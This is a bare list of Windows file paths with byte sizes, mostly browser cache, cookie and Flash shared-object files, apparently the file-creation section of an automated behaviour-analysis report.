    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[3].js (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000auhI5Es2H1IzqY5W6[1].png (2660 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f0000mUMSYcE3MmsKSaAf[1].swf (13565 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=3235&tlm=1398686606&tcn=1402680638&tpr=1402680635228&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CACT67OH.htm (2583 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CA96ZLPM.htm (5026 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=593&tlm=1398686606&tcn=1402680568&tpr=1402680568181&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f0007ZNkmgz9HxtqBwkgs[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\o[2].htm (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[3].js (24 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (366 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\AC_RunActiveContent[2].js (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[1].js (368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\mnh_428cc[1].htm (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\wh[2].js (7200 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f0002dsZ58R_Ik2MbXxd0[1].jpg (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000QfY4TDI-RZtJ88Rf0[1].png (3235 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAENI3QT (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAAXO9MV.htm (2881 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[2].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\nav_bg[1].gif (2309 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\adx[1].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\8[1].css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000AY4Gp2TGCsxgDBTq0[1].swf (825 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[2].js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000nG8QJ8V4VWIdqsns6[1].jpg (5938 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\c[2].js (7080 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[1].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2671&tlm=1398686606&tcn=1402680570&tpr=1402680568181&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\sync_pos[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\sync[1].htm (893 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CA0VYZQG.swf (5407 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=625&tlm=1398686606&tcn=1402680635&tpr=1402680635228&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\adx[1].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\o[1].htm (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\AC_RunActiveContent[1].js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[3].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000AV1EG-sYD_d7YFHc6[1].jpg (1345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000rmn6cn7D14hDeZLyf[1].gif (2073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mnh_428cc[1].html (724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\21[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CACPIZKT (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\c[1].js (7522 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (1975 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=953&tlm=1398686606&tcn=1402680602&tpr=1402680601119&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[5].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CA01SNO7.htm (4757 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000jtT4CGxjFHdyV6mBf[1].swf (1321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CA1LB4EV.htm (1967 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\mini_mnh_428[1].html (886 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAJMYP73.htm (2072 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\6[1].png (772 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\2[1].png (770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\4[1].png (770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\3.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\2.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\5.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\Down\ETagFile.dat (1228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\7[1].png (770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\u2[1].htm (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\5[1].png (773 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\tj[1].htm (76 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\1.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\4.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\7.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\6.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\edi.dat (324231 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\3[1].png (770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\btns[1].js (1 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\Fav9.dat (28289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\du[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\AppData\LocalLow\Mnying\btns.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\1[1].png (1435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\2[1].jpg (3955 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\1[1].jpg (2714 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\409[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[2].js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\css[1].css (2 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\www.mnh.kaixin200[1].xml (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\4[1].jpg (5312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\bt-3[1].png (931 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\3[1].jpg (2799 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (189 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\bt1[1].png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[3].js (12 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[4].xml (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\new_box[1].js (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[6].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[7].xml (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[1].xml (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\170[1].png (398 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\ppwebtest.sxx (158 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\channelInfo[1].htm (113 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34bc[1].data (38348 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fyminiloader-min[1].js (363 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a9[1].data (28966 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34bd[1].data (44293 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\[[IMPORT]]\resource.dl.kukuplay.com\upload\fishrlv31.swf\adsWeekLimit.sxx (34 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (200 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\693619_1371525642501[1].htm (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\mobileAds4[1].swf (4180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\X-cdn[1] (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\339[1].png (2661 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mini[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ad[1].data (37369 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fyminiloader-min[2].js (660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fengyun[1].swf (33043 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (164 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\LiveClientID.sxx (124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34ba[1].data (51029 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[6].xml (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\xvideo15s140529[1].aspx (32649 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\ForbiddenTiming[1].htm (33 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c1[1].data (37339 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34bf[1].data (42225 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[5].xml (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34be[1].data (48562 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\logoyanyi[1].FLV (104026 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34a8[1].data (22189 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\hm[1].js (5 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (215 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\jquery-1.8.3.min[1].js (60821 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CA4PMVS9.gif (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34aa[1].data (37363 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXE.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\init[1].htm (38 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#resource.ws.kukuplay.com\settings.sxx (235 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (717 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\flv[1].head (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ae[1].data (45285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\analytics[1].js (584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[8].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\requestviewrlv10[1].swf (649 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\231[1].png (1661 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\core[1].php (800 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (243 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\bg[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34c5[1].data (4511 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[2].xml (245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b5[1].data (30649 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ac[1].data (30083 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\play[1].htm (476 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\uiComponent[1].swf (61382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\textLayout_2.0.0.232[1].swf (47080 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\mini[1].css (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mini[1].js (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\fymini[1].htm (4447 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\rt[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\flaF.tmp (102454 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[3].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\94[1].png (749 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34a8[1].data (37103 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\boxTag.sxx (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[1].js (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[1].xml (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\InterAct-96[1].swf (74456 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[4].xml (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[8].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\spark_4.6.0.22920[1].swf (115705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[2].xml (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\191[1].png (932 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b4[1].data (23772 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34b0[1].data (32625 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b8[1].data (31725 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (901 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[5].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\X-cdn[1] (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[4].xml (255 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\BinCookie.sxx (65 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34a6[1].data (44953 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34b3[1].data (29013 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\new_common[1].css (73 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\MukioPlayer.sxx (33 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (472 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b7[1].data (25569 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34b9[1].data (46847 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\xvideo15s140529[1].aspx (35569 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\stat[1].php (4098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[7].xml (253 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\ok[1].com&c=693619_1371525642501 (344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\246[1].png (2705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\ok[1].htm (476 bytes)
    %Documents and Settings%\%current user%\UserData\YJM90VAL\statistics.m0lxcdn.kukuplay[1].xml (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\framework_4.6.0.22920[1].swf (87780 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\play[1].com&c=693619_1371525642501 (343 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[1].xml (245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\fishrlv31[1].swf (34444 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\mini.fengyunzhibo[1].xml (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\dynchannelproperty[1].htm (363 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[9].xml (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[3].xml (255 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (245 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\[[IMPORT]]\resource.dl.kukuplay.com\upload\fishrlv31.swf\adsCache.sxx (30 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (675 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c0[1].data (28876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\csplayer15s0319[1].aspx (15619 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[5].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34bb[1].data (40426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\fymini[2].htm (4721 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\BarrageV5.7[1].swf (83993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34b2[1].data (15951 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34a9[1].data (16157 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[2].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAIZWDOT.gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a7[2].data (32303 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\channelInfo[1].htm (70 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34af[1].data (25355 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (480 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b6[1].data (28509 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\channelInfo[1].htm (70 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\185[1].png (1700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c3[1].data (30517 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[2].js (547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[6].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[3].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b1[1].data (22083 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\normalImage[1].png (1189 bytes)
